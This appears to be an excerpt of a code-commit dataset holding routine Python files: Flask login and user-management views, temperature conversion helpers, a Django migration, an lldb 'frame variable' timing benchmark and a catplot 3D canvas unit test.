flash(u"Invalid username or password.", "danger")
return render_template("login.html",
loggedinuser=current_user)
@app.route('/logout/')
@login_required
def logout():
logout_user()
flash('Logged out', 'success')
redir_url = url_for("dashboard")
return redirect(redir_url)
|
Add views on to user management functionsfrom flask import Flask, render_template, flash, request, Markup, \
session, redirect, url_for, escape, Response, abort, send_file, \
current_app
from flask.ext.login import (LoginManager, current_user, login_required,
login_user, logout_user, UserMixin,
confirm_login,
fresh_login_required)
from maediprojects import app, db, models
from maediprojects.query import user as quser
from maediprojects.lib import codelists
login_manager = LoginManager()
login_manager.setup_app(app)
login_manager.login_view = "login"
@login_manager.user_loader
def load_user(id):
return quser.user(id)
@app.route("/users/")
@login_required
def users():
users = quser.user()
return render_template("users.html",
users = users,
loggedinuser=current_user)
@app.route("/users/new/", methods=["GET", "POST"])
@login_required
def users_new():
if request.method=="GET":
user = {}
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.addUser(request.form):
flash("Successfully created user!", "success")
else:
flash("Sorry, couldn't create that user!", "danger")
return redirect(url_for("users"))
@app.route("/users/<user_id>/", methods=["GET", "POST"])
@login_required
def users_edit(user_id):
if request.method=="GET":
user = quser.user(user_id)
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.updateUser(request.form):
flash("Successfully updated user!", "success")
else:
flash("Sorry, couldn't update that user!", "danger")
return redirect(url_for("users"))
@app.route("/login/", methods=["GET", "POST"])
def login():
if request.method == "POST" and "username" in request.form:
user = quser.user_by_username(request.form["username"])
if (user and user.check_password(request.form["password"])):
if login_user(user):
flash("Logged in!", "success")
if request.args.get("next"):
redir_url = request.script_root + request.args.get("next")
else:
redir_url = url_for("dashboard")
return redirect(redir_url)
else:
flash("Sorry, but you could not log in.", "danger")
else:
flash(u"Invalid username or password.", "danger")
return render_template("login.html",
loggedinuser=current_user)
@app.route('/logout/')
@login_required
def logout():
logout_user()
flash('Logged out', 'success')
redir_url = url_for("dashboard")
return redirect(redir_url)
|
<commit_before><commit_msg>Add views on to user management functions<commit_after>from flask import Flask, render_template, flash, request, Markup, \
session, redirect, url_for, escape, Response, abort, send_file, \
current_app
from flask.ext.login import (LoginManager, current_user, login_required,
login_user, logout_user, UserMixin,
confirm_login,
fresh_login_required)
from maediprojects import app, db, models
from maediprojects.query import user as quser
from maediprojects.lib import codelists
login_manager = LoginManager()
login_manager.setup_app(app)
login_manager.login_view = "login"
@login_manager.user_loader
def load_user(id):
return quser.user(id)
@app.route("/users/")
@login_required
def users():
users = quser.user()
return render_template("users.html",
users = users,
loggedinuser=current_user)
@app.route("/users/new/", methods=["GET", "POST"])
@login_required
def users_new():
if request.method=="GET":
user = {}
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.addUser(request.form):
flash("Successfully created user!", "success")
else:
flash("Sorry, couldn't create that user!", "danger")
return redirect(url_for("users"))
@app.route("/users/<user_id>/", methods=["GET", "POST"])
@login_required
def users_edit(user_id):
if request.method=="GET":
user = quser.user(user_id)
return render_template("user.html",
user = user,
loggedinuser=current_user,
codelists = codelists.get_codelists())
elif request.method == "POST":
if quser.updateUser(request.form):
flash("Successfully updated user!", "success")
else:
flash("Sorry, couldn't update that user!", "danger")
return redirect(url_for("users"))
@app.route("/login/", methods=["GET", "POST"])
def login():
if request.method == "POST" and "username" in request.form:
user = quser.user_by_username(request.form["username"])
if (user and user.check_password(request.form["password"])):
if login_user(user):
flash("Logged in!", "success")
if request.args.get("next"):
redir_url = request.script_root + request.args.get("next")
else:
redir_url = url_for("dashboard")
return redirect(redir_url)
else:
flash("Sorry, but you could not log in.", "danger")
else:
flash(u"Invalid username or password.", "danger")
return render_template("login.html",
loggedinuser=current_user)
@app.route('/logout/')
@login_required
def logout():
logout_user()
flash('Logged out', 'success')
redir_url = url_for("dashboard")
return redirect(redir_url)
|
|
e0cd375fbd7085a989f73da1259fe70a1c50bd36
|
src/test_functions.py
|
src/test_functions.py
|
def k_to_c(temp):
return temp - 273.15
def f_to_k(temp):
    return ((temp - 32) * (5.0 / 9.0)) + 273.15
def f_to_c(temp):
temp_k = f_to_k(temp)
result = k_to_c(temp_k)
return result
|
Add a test python function
|
Add a test python function
|
Python
|
mit
|
xykang/2015-05-12-BUSM-git,xykang/2015-05-12-BUSM-git
|
Add a test python function
|
def k_to_c(temp):
return temp - 273.15
def f_to_k(temp):
    return ((temp - 32) * (5.0 / 9.0)) + 273.15
def f_to_c(temp):
temp_k = f_to_k(temp)
result = k_to_c(temp_k)
return result
|
<commit_before><commit_msg>Add a test python function<commit_after>
|
def k_to_c(temp):
return temp - 273.15
def f_to_k(temp):
    return ((temp - 32) * (5.0 / 9.0)) + 273.15
def f_to_c(temp):
temp_k = f_to_k(temp)
result = k_to_c(temp_k)
return result
|
Add a test python functiondef k_to_c(temp):
return temp - 273.15
def f_to_k(temp):
    return ((temp - 32) * (5.0 / 9.0)) + 273.15
def f_to_c(temp):
temp_k = f_to_k(temp)
result = k_to_c(temp_k)
return result
|
<commit_before><commit_msg>Add a test python function<commit_after>def k_to_c(temp):
return temp - 273.15
def f_to_k(temp):
    return ((temp - 32) * (5.0 / 9.0)) + 273.15
def f_to_c(temp):
temp_k = f_to_k(temp)
result = k_to_c(temp_k)
return result
|
|
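A quick sanity check of these helpers (not part of the original commit; the expected values follow from the standard conversion formulas):
assert abs(k_to_c(273.15) - 0.0) < 1e-9    # 273.15 K is 0 degrees Celsius
assert abs(f_to_k(32) - 273.15) < 1e-9     # 32 degrees Fahrenheit is 273.15 K
assert abs(f_to_c(212) - 100.0) < 1e-9     # 212 degrees Fahrenheit is 100 degrees Celsius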
6be9586a81ef426620ea33e61d8ad1137746d6f8
|
webtool/server/migrations/0029_auto_20181216_1323.py
|
webtool/server/migrations/0029_auto_20181216_1323.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-12-16 12:23
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
import re
class Migration(migrations.Migration):
dependencies = [
('server', '0028_auto_20181211_1333'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='member_id',
field=models.CharField(help_text='Format:sss-oo-mmmmmm s=Sektionsnummer(008) o=Ortsgruppe(00|01) m=Mitgliedsnummer', max_length=13, null=True, unique=True, blank=True, validators=[django.core.validators.RegexValidator(re.compile('\\d{3}-\\d{2}-\\d{6}', 32), 'Bitte auf den richtigen Aufbau achten')], verbose_name='MitgliedsNr'),
),
]
|
Improve member_id field (We need the possibility of member_id = NULL)
|
Improve member_id field (We need the possibility of member_id = NULL)
|
Python
|
bsd-2-clause
|
wodo/WebTool3,wodo/WebTool3,wodo/WebTool3,wodo/WebTool3
|
Improve member_id field (We need the possibility of member_id = NULL)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-12-16 12:23
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
import re
class Migration(migrations.Migration):
dependencies = [
('server', '0028_auto_20181211_1333'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='member_id',
field=models.CharField(help_text='Format:sss-oo-mmmmmm s=Sektionsnummer(008) o=Ortsgruppe(00|01) m=Mitgliedsnummer', max_length=13, null=True, unique=True, blank=True, validators=[django.core.validators.RegexValidator(re.compile('\\d{3}-\\d{2}-\\d{6}', 32), 'Bitte auf den richtigen Aufbau achten')], verbose_name='MitgliedsNr'),
),
]
|
<commit_before><commit_msg>Improve member_id field (We need the possibility of member_id = NULL)<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-12-16 12:23
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
import re
class Migration(migrations.Migration):
dependencies = [
('server', '0028_auto_20181211_1333'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='member_id',
field=models.CharField(help_text='Format:sss-oo-mmmmmm s=Sektionsnummer(008) o=Ortsgruppe(00|01) m=Mitgliedsnummer', max_length=13, null=True, unique=True, blank=True, validators=[django.core.validators.RegexValidator(re.compile('\\d{3}-\\d{2}-\\d{6}', 32), 'Bitte auf den richtigen Aufbau achten')], verbose_name='MitgliedsNr'),
),
]
|
Improve member_id field (We need the possibility of member_id = NULL)# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-12-16 12:23
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
import re
class Migration(migrations.Migration):
dependencies = [
('server', '0028_auto_20181211_1333'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='member_id',
field=models.CharField(help_text='Format:sss-oo-mmmmmm s=Sektionsnummer(008) o=Ortsgruppe(00|01) m=Mitgliedsnummer', max_length=13, null=True, unique=True, blank=True, validators=[django.core.validators.RegexValidator(re.compile('\\d{3}-\\d{2}-\\d{6}', 32), 'Bitte auf den richtigen Aufbau achten')], verbose_name='MitgliedsNr'),
),
]
|
<commit_before><commit_msg>Improve member_id field (We need the possibility of member_id = NULL)<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-12-16 12:23
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
import re
class Migration(migrations.Migration):
dependencies = [
('server', '0028_auto_20181211_1333'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='member_id',
field=models.CharField(help_text='Format:sss-oo-mmmmmm s=Sektionsnummer(008) o=Ortsgruppe(00|01) m=Mitgliedsnummer', max_length=13, null=True, unique=True, blank=True, validators=[django.core.validators.RegexValidator(re.compile('\\d{3}-\\d{2}-\\d{6}', 32), 'Bitte auf den richtigen Aufbau achten')], verbose_name='MitgliedsNr'),
),
]
|
|
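For context, the model field this migration alters would look roughly like the sketch below (the field arguments are copied from the migration itself; the surrounding Profile model is an assumption):
import re
import django.core.validators
from django.db import models

class Profile(models.Model):  # hypothetical surrounding model
    member_id = models.CharField(
        verbose_name='MitgliedsNr', max_length=13,
        unique=True, null=True, blank=True,
        help_text='Format:sss-oo-mmmmmm s=Sektionsnummer(008) '
                  'o=Ortsgruppe(00|01) m=Mitgliedsnummer',
        validators=[django.core.validators.RegexValidator(
            re.compile('\\d{3}-\\d{2}-\\d{6}'),
            'Bitte auf den richtigen Aufbau achten')])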
d91085396ec4b61e678c32f90dc3f40f44bad121
|
test/benchmarks/frame_variable/TestFrameVariableResponse.py
|
test/benchmarks/frame_variable/TestFrameVariableResponse.py
|
"""Test lldb's response time for 'frame variable' command."""
import os, sys
import unittest2
import lldb
import pexpect
from lldbbench import *
class FrameVariableResponseBench(BenchBase):
mydir = os.path.join("benchmarks", "frame_variable")
def setUp(self):
BenchBase.setUp(self)
if lldb.bmExecutable:
self.exe = lldb.bmExecutable
else:
self.exe = self.lldbHere
if lldb.bmBreakpointSpec:
self.break_spec = lldb.bmBreakpointSpec
else:
self.break_spec = '-n main'
self.count = lldb.bmIterationCount
if self.count <= 0:
self.count = 20
@benchmarks_test
def test_startup_delay(self):
"""Test response time for the 'frame variable' command."""
print
self.run_frame_variable_bench(self.exe, self.break_spec, self.count)
print "lldb frame variable benchmark:", self.stopwatch
def run_frame_variable_bench(self, exe, break_spec, count):
# Set self.child_prompt, which is "(lldb) ".
self.child_prompt = '(lldb) '
prompt = self.child_prompt
        # Reset the stopwatches now.
self.stopwatch.reset()
for i in range(count):
# So that the child gets torn down after the test.
self.child = pexpect.spawn('%s %s %s' % (self.lldbHere, self.lldbOption, exe))
child = self.child
# Turn on logging for what the child sends back.
if self.TraceOn():
child.logfile_read = sys.stdout
# Set our breakpoint.
child.sendline('breakpoint set %s' % break_spec)
child.expect_exact(prompt)
# Run the target and expect it to be stopped due to breakpoint.
child.sendline('run') # Aka 'process launch'.
child.expect_exact(prompt)
with self.stopwatch:
# Measure the 'frame variable' response time.
child.sendline('frame variable')
child.expect_exact(prompt)
child.sendline('quit')
try:
self.child.expect(pexpect.EOF)
except:
pass
# The test is about to end and if we come to here, the child process has
# been terminated. Mark it so.
self.child = None
if __name__ == '__main__':
import atexit
lldb.SBDebugger.Initialize()
atexit.register(lambda: lldb.SBDebugger.Terminate())
unittest2.main()
|
Add a benchmark for measuring the response time of the 'frame variable' command. Example (start the lldb inferior, break at the Driver::MainLoop() function, and issue 'frame variable'):
|
Add a benchmark for measuring the response time of the 'frame variable' command.
Example (start the lldb inferior, break at the Driver::MainLoop() function, and
issue 'frame variable'):
$ ./dotest.py -v +b -x '-F Driver::MainLoop()' -n -p TestFrameVariableResponse.py
----------------------------------------------------------------------
Collected 1 test
1: test_startup_delay (TestFrameVariableResponse.FrameVariableResponseBench)
Test response time for the 'frame variable' command. ...
lldb frame variable benchmark: Avg: 1.636897 (Laps: 20, Total Elapsed Time: 32.737944)
ok
----------------------------------------------------------------------
Ran 1 test in 65.105s
OK
git-svn-id: b33bab8abb5b18c12ee100cd7761ab452d00b2b0@142678 91177308-0d34-0410-b5e6-96231b3b80d8
|
Python
|
apache-2.0
|
apple/swift-lldb,llvm-mirror/lldb,apple/swift-lldb,llvm-mirror/lldb,llvm-mirror/lldb,apple/swift-lldb,llvm-mirror/lldb,apple/swift-lldb,apple/swift-lldb,apple/swift-lldb,llvm-mirror/lldb
|
Add a benchmark for measuring the response time of the 'frame variable' command.
Example (start the lldb inferior, break at the Driver::MainLoop() function, and
issue 'frame variable'):
$ ./dotest.py -v +b -x '-F Driver::MainLoop()' -n -p TestFrameVariableResponse.py
----------------------------------------------------------------------
Collected 1 test
1: test_startup_delay (TestFrameVariableResponse.FrameVariableResponseBench)
Test response time for the 'frame variable' command. ...
lldb frame variable benchmark: Avg: 1.636897 (Laps: 20, Total Elapsed Time: 32.737944)
ok
----------------------------------------------------------------------
Ran 1 test in 65.105s
OK
git-svn-id: b33bab8abb5b18c12ee100cd7761ab452d00b2b0@142678 91177308-0d34-0410-b5e6-96231b3b80d8
|
"""Test lldb's response time for 'frame variable' command."""
import os, sys
import unittest2
import lldb
import pexpect
from lldbbench import *
class FrameVariableResponseBench(BenchBase):
mydir = os.path.join("benchmarks", "frame_variable")
def setUp(self):
BenchBase.setUp(self)
if lldb.bmExecutable:
self.exe = lldb.bmExecutable
else:
self.exe = self.lldbHere
if lldb.bmBreakpointSpec:
self.break_spec = lldb.bmBreakpointSpec
else:
self.break_spec = '-n main'
self.count = lldb.bmIterationCount
if self.count <= 0:
self.count = 20
@benchmarks_test
def test_startup_delay(self):
"""Test response time for the 'frame variable' command."""
print
self.run_frame_variable_bench(self.exe, self.break_spec, self.count)
print "lldb frame variable benchmark:", self.stopwatch
def run_frame_variable_bench(self, exe, break_spec, count):
# Set self.child_prompt, which is "(lldb) ".
self.child_prompt = '(lldb) '
prompt = self.child_prompt
        # Reset the stopwatches now.
self.stopwatch.reset()
for i in range(count):
# So that the child gets torn down after the test.
self.child = pexpect.spawn('%s %s %s' % (self.lldbHere, self.lldbOption, exe))
child = self.child
# Turn on logging for what the child sends back.
if self.TraceOn():
child.logfile_read = sys.stdout
# Set our breakpoint.
child.sendline('breakpoint set %s' % break_spec)
child.expect_exact(prompt)
# Run the target and expect it to be stopped due to breakpoint.
child.sendline('run') # Aka 'process launch'.
child.expect_exact(prompt)
with self.stopwatch:
# Measure the 'frame variable' response time.
child.sendline('frame variable')
child.expect_exact(prompt)
child.sendline('quit')
try:
self.child.expect(pexpect.EOF)
except:
pass
# The test is about to end and if we come to here, the child process has
# been terminated. Mark it so.
self.child = None
if __name__ == '__main__':
import atexit
lldb.SBDebugger.Initialize()
atexit.register(lambda: lldb.SBDebugger.Terminate())
unittest2.main()
|
<commit_before><commit_msg>Add a benchmark for measuring the response time of the 'frame variable' command.
Example (start the lldb inferior, break at the Driver::MainLoop() function, and
issue 'frame variable'):
$ ./dotest.py -v +b -x '-F Driver::MainLoop()' -n -p TestFrameVariableResponse.py
----------------------------------------------------------------------
Collected 1 test
1: test_startup_delay (TestFrameVariableResponse.FrameVariableResponseBench)
Test response time for the 'frame variable' command. ...
lldb frame variable benchmark: Avg: 1.636897 (Laps: 20, Total Elapsed Time: 32.737944)
ok
----------------------------------------------------------------------
Ran 1 test in 65.105s
OK
git-svn-id: b33bab8abb5b18c12ee100cd7761ab452d00b2b0@142678 91177308-0d34-0410-b5e6-96231b3b80d8<commit_after>
|
"""Test lldb's response time for 'frame variable' command."""
import os, sys
import unittest2
import lldb
import pexpect
from lldbbench import *
class FrameVariableResponseBench(BenchBase):
mydir = os.path.join("benchmarks", "frame_variable")
def setUp(self):
BenchBase.setUp(self)
if lldb.bmExecutable:
self.exe = lldb.bmExecutable
else:
self.exe = self.lldbHere
if lldb.bmBreakpointSpec:
self.break_spec = lldb.bmBreakpointSpec
else:
self.break_spec = '-n main'
self.count = lldb.bmIterationCount
if self.count <= 0:
self.count = 20
@benchmarks_test
def test_startup_delay(self):
"""Test response time for the 'frame variable' command."""
print
self.run_frame_variable_bench(self.exe, self.break_spec, self.count)
print "lldb frame variable benchmark:", self.stopwatch
def run_frame_variable_bench(self, exe, break_spec, count):
# Set self.child_prompt, which is "(lldb) ".
self.child_prompt = '(lldb) '
prompt = self.child_prompt
        # Reset the stopwatches now.
self.stopwatch.reset()
for i in range(count):
# So that the child gets torn down after the test.
self.child = pexpect.spawn('%s %s %s' % (self.lldbHere, self.lldbOption, exe))
child = self.child
# Turn on logging for what the child sends back.
if self.TraceOn():
child.logfile_read = sys.stdout
# Set our breakpoint.
child.sendline('breakpoint set %s' % break_spec)
child.expect_exact(prompt)
# Run the target and expect it to be stopped due to breakpoint.
child.sendline('run') # Aka 'process launch'.
child.expect_exact(prompt)
with self.stopwatch:
# Measure the 'frame variable' response time.
child.sendline('frame variable')
child.expect_exact(prompt)
child.sendline('quit')
try:
self.child.expect(pexpect.EOF)
except:
pass
# The test is about to end and if we come to here, the child process has
# been terminated. Mark it so.
self.child = None
if __name__ == '__main__':
import atexit
lldb.SBDebugger.Initialize()
atexit.register(lambda: lldb.SBDebugger.Terminate())
unittest2.main()
|
Add a benchmark for measuring the response time of the 'frame variable' command.
Example (start the lldb inferior, break at the Driver::MainLoop() function, and
issue 'frame variable'):
$ ./dotest.py -v +b -x '-F Driver::MainLoop()' -n -p TestFrameVariableResponse.py
----------------------------------------------------------------------
Collected 1 test
1: test_startup_delay (TestFrameVariableResponse.FrameVariableResponseBench)
Test response time for the 'frame variable' command. ...
lldb frame variable benchmark: Avg: 1.636897 (Laps: 20, Total Elapsed Time: 32.737944)
ok
----------------------------------------------------------------------
Ran 1 test in 65.105s
OK
git-svn-id: b33bab8abb5b18c12ee100cd7761ab452d00b2b0@142678 91177308-0d34-0410-b5e6-96231b3b80d8"""Test lldb's response time for 'frame variable' command."""
import os, sys
import unittest2
import lldb
import pexpect
from lldbbench import *
class FrameVariableResponseBench(BenchBase):
mydir = os.path.join("benchmarks", "frame_variable")
def setUp(self):
BenchBase.setUp(self)
if lldb.bmExecutable:
self.exe = lldb.bmExecutable
else:
self.exe = self.lldbHere
if lldb.bmBreakpointSpec:
self.break_spec = lldb.bmBreakpointSpec
else:
self.break_spec = '-n main'
self.count = lldb.bmIterationCount
if self.count <= 0:
self.count = 20
@benchmarks_test
def test_startup_delay(self):
"""Test response time for the 'frame variable' command."""
print
self.run_frame_variable_bench(self.exe, self.break_spec, self.count)
print "lldb frame variable benchmark:", self.stopwatch
def run_frame_variable_bench(self, exe, break_spec, count):
# Set self.child_prompt, which is "(lldb) ".
self.child_prompt = '(lldb) '
prompt = self.child_prompt
        # Reset the stopwatches now.
self.stopwatch.reset()
for i in range(count):
# So that the child gets torn down after the test.
self.child = pexpect.spawn('%s %s %s' % (self.lldbHere, self.lldbOption, exe))
child = self.child
# Turn on logging for what the child sends back.
if self.TraceOn():
child.logfile_read = sys.stdout
# Set our breakpoint.
child.sendline('breakpoint set %s' % break_spec)
child.expect_exact(prompt)
# Run the target and expect it to be stopped due to breakpoint.
child.sendline('run') # Aka 'process launch'.
child.expect_exact(prompt)
with self.stopwatch:
# Measure the 'frame variable' response time.
child.sendline('frame variable')
child.expect_exact(prompt)
child.sendline('quit')
try:
self.child.expect(pexpect.EOF)
except:
pass
# The test is about to end and if we come to here, the child process has
# been terminated. Mark it so.
self.child = None
if __name__ == '__main__':
import atexit
lldb.SBDebugger.Initialize()
atexit.register(lambda: lldb.SBDebugger.Terminate())
unittest2.main()
|
<commit_before><commit_msg>Add a benchmark for measuring the response time of the 'frame variable' command.
Example (start the lldb inferior, break at the Driver::MainLoop() function, and
issue 'frame variable'):
$ ./dotest.py -v +b -x '-F Driver::MainLoop()' -n -p TestFrameVariableResponse.py
----------------------------------------------------------------------
Collected 1 test
1: test_startup_delay (TestFrameVariableResponse.FrameVariableResponseBench)
Test response time for the 'frame variable' command. ...
lldb frame variable benchmark: Avg: 1.636897 (Laps: 20, Total Elapsed Time: 32.737944)
ok
----------------------------------------------------------------------
Ran 1 test in 65.105s
OK
git-svn-id: b33bab8abb5b18c12ee100cd7761ab452d00b2b0@142678 91177308-0d34-0410-b5e6-96231b3b80d8<commit_after>"""Test lldb's response time for 'frame variable' command."""
import os, sys
import unittest2
import lldb
import pexpect
from lldbbench import *
class FrameVariableResponseBench(BenchBase):
mydir = os.path.join("benchmarks", "frame_variable")
def setUp(self):
BenchBase.setUp(self)
if lldb.bmExecutable:
self.exe = lldb.bmExecutable
else:
self.exe = self.lldbHere
if lldb.bmBreakpointSpec:
self.break_spec = lldb.bmBreakpointSpec
else:
self.break_spec = '-n main'
self.count = lldb.bmIterationCount
if self.count <= 0:
self.count = 20
@benchmarks_test
def test_startup_delay(self):
"""Test response time for the 'frame variable' command."""
print
self.run_frame_variable_bench(self.exe, self.break_spec, self.count)
print "lldb frame variable benchmark:", self.stopwatch
def run_frame_variable_bench(self, exe, break_spec, count):
# Set self.child_prompt, which is "(lldb) ".
self.child_prompt = '(lldb) '
prompt = self.child_prompt
        # Reset the stopwatches now.
self.stopwatch.reset()
for i in range(count):
# So that the child gets torn down after the test.
self.child = pexpect.spawn('%s %s %s' % (self.lldbHere, self.lldbOption, exe))
child = self.child
# Turn on logging for what the child sends back.
if self.TraceOn():
child.logfile_read = sys.stdout
# Set our breakpoint.
child.sendline('breakpoint set %s' % break_spec)
child.expect_exact(prompt)
# Run the target and expect it to be stopped due to breakpoint.
child.sendline('run') # Aka 'process launch'.
child.expect_exact(prompt)
with self.stopwatch:
# Measure the 'frame variable' response time.
child.sendline('frame variable')
child.expect_exact(prompt)
child.sendline('quit')
try:
self.child.expect(pexpect.EOF)
except:
pass
# The test is about to end and if we come to here, the child process has
# been terminated. Mark it so.
self.child = None
if __name__ == '__main__':
import atexit
lldb.SBDebugger.Initialize()
atexit.register(lambda: lldb.SBDebugger.Terminate())
unittest2.main()
|
|
dea65af465b8ffab2a0e85eb0823157253986de7
|
tests/grid_3d_canvas_test.py
|
tests/grid_3d_canvas_test.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Test case for 3D grid canvas.
"""
import unittest
from matplotlib.collections import PathCollection
from catplot.grid_components.grid_canvas import Grid3DCanvas
from catplot.grid_components.nodes import Node3D
class Grid3DCanvasTest(unittest.TestCase):
def setUp(self):
self.maxDiff = True
def test_construction_and_query(self):
""" Test the 2D grid canvas can be constructed corretly.
"""
canvas = Grid3DCanvas()
self.assertListEqual(canvas.nodes, [])
self.assertListEqual(canvas.edges, [])
def test_add_node(self):
""" Make sure we can add node to canvas correctly.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
# Check nodes in canvas.
self.assertTrue(canvas.nodes)
for node in canvas.nodes:
self.assertTrue(isinstance(node, Node3D))
# Check colors.
for c in canvas.node_edgecolors:
self.assertEqual(c, "#000000")
for c in canvas.node_colors:
self.assertEqual(c, "#000000")
        # Check coordinates.
ref_coordinates = [[0.5, 0.5, 0.5], [1.0, 1.0, 1.0]]
self.assertListEqual(ref_coordinates, canvas.node_coordinates.tolist())
def test_draw(self):
""" Make sure we can draw in grid canvas without exception raised.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
canvas.draw()
if "__main__" == __name__:
suite = unittest.TestLoader().loadTestsFromTestCase(Grid3DCanvasTest)
unittest.TextTestRunner(verbosity=2).run(suite)
|
Add 3d grid canvas test.
|
Add 3d grid canvas test.
|
Python
|
mit
|
PytLab/catplot
|
Add 3d grid canvas test.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Test case for 3D grid canvas.
"""
import unittest
from matplotlib.collections import PathCollection
from catplot.grid_components.grid_canvas import Grid3DCanvas
from catplot.grid_components.nodes import Node3D
class Grid3DCanvasTest(unittest.TestCase):
def setUp(self):
self.maxDiff = True
def test_construction_and_query(self):
""" Test the 2D grid canvas can be constructed corretly.
"""
canvas = Grid3DCanvas()
self.assertListEqual(canvas.nodes, [])
self.assertListEqual(canvas.edges, [])
def test_add_node(self):
""" Make sure we can add node to canvas correctly.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
# Check nodes in canvas.
self.assertTrue(canvas.nodes)
for node in canvas.nodes:
self.assertTrue(isinstance(node, Node3D))
# Check colors.
for c in canvas.node_edgecolors:
self.assertEqual(c, "#000000")
for c in canvas.node_colors:
self.assertEqual(c, "#000000")
        # Check coordinates.
ref_coordinates = [[0.5, 0.5, 0.5], [1.0, 1.0, 1.0]]
self.assertListEqual(ref_coordinates, canvas.node_coordinates.tolist())
def test_draw(self):
""" Make sure we can draw in grid canvas without exception raised.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
canvas.draw()
if "__main__" == __name__:
suite = unittest.TestLoader().loadTestsFromTestCase(Grid3DCanvasTest)
unittest.TextTestRunner(verbosity=2).run(suite)
|
<commit_before><commit_msg>Add 3d grid canvas test.<commit_after>
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Test case for 3D grid canvas.
"""
import unittest
from matplotlib.collections import PathCollection
from catplot.grid_components.grid_canvas import Grid3DCanvas
from catplot.grid_components.nodes import Node3D
class Grid3DCanvasTest(unittest.TestCase):
def setUp(self):
self.maxDiff = True
def test_construction_and_query(self):
""" Test the 2D grid canvas can be constructed corretly.
"""
canvas = Grid3DCanvas()
self.assertListEqual(canvas.nodes, [])
self.assertListEqual(canvas.edges, [])
def test_add_node(self):
""" Make sure we can add node to canvas correctly.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
# Check nodes in canvas.
self.assertTrue(canvas.nodes)
for node in canvas.nodes:
self.assertTrue(isinstance(node, Node3D))
# Check colors.
for c in canvas.node_edgecolors:
self.assertEqual(c, "#000000")
for c in canvas.node_colors:
self.assertEqual(c, "#000000")
        # Check coordinates.
ref_coordinates = [[0.5, 0.5, 0.5], [1.0, 1.0, 1.0]]
self.assertListEqual(ref_coordinates, canvas.node_coordinates.tolist())
def test_draw(self):
""" Make sure we can draw in grid canvas without exception raised.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
canvas.draw()
if "__main__" == __name__:
suite = unittest.TestLoader().loadTestsFromTestCase(Grid3DCanvasTest)
unittest.TextTestRunner(verbosity=2).run(suite)
|
Add 3d grid canvas test.#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Test case for 3D grid canvas.
"""
import unittest
from matplotlib.collections import PathCollection
from catplot.grid_components.grid_canvas import Grid3DCanvas
from catplot.grid_components.nodes import Node3D
class Grid3DCanvasTest(unittest.TestCase):
def setUp(self):
self.maxDiff = True
def test_construction_and_query(self):
""" Test the 2D grid canvas can be constructed corretly.
"""
canvas = Grid3DCanvas()
self.assertListEqual(canvas.nodes, [])
self.assertListEqual(canvas.edges, [])
def test_add_node(self):
""" Make sure we can add node to canvas correctly.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
# Check nodes in canvas.
self.assertTrue(canvas.nodes)
for node in canvas.nodes:
self.assertTrue(isinstance(node, Node3D))
# Check colors.
for c in canvas.node_edgecolors:
self.assertEqual(c, "#000000")
for c in canvas.node_colors:
self.assertEqual(c, "#000000")
        # Check coordinates.
ref_coordinates = [[0.5, 0.5, 0.5], [1.0, 1.0, 1.0]]
self.assertListEqual(ref_coordinates, canvas.node_coordinates.tolist())
def test_draw(self):
""" Make sure we can draw in grid canvas without exception raised.
"""
canvas = Grid3DCanvas()
n1 = Node3D([0.5, 0.5, 0.5])
n2 = Node3D([1.0, 1.0, 1.0])
canvas.add_node(n1)
canvas.add_node(n2)
canvas.draw()
if "__main__" == __name__:
suite = unittest.TestLoader().loadTestsFromTestCase(Grid3DCanvasTest)
unittest.TextTestRunner(verbosity=2).run(suite)
|
<commit_before><commit_msg>Add 3d grid canvas test.<commit_after>#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Test case for 3D grid canvas.
"""
import unittest
from matplotlib.collections import PathCollection
from catplot.grid_components.grid_canvas import Grid3DCanvas
from catplot.grid_components.nodes import Node3D
class Grid3DCanvasTest(unittest.TestCase):
def setUp(self):
self.maxDiff = True
def test_construction_and_query(self):
""" Test the 2D grid canvas can be constructed corretly.
"""
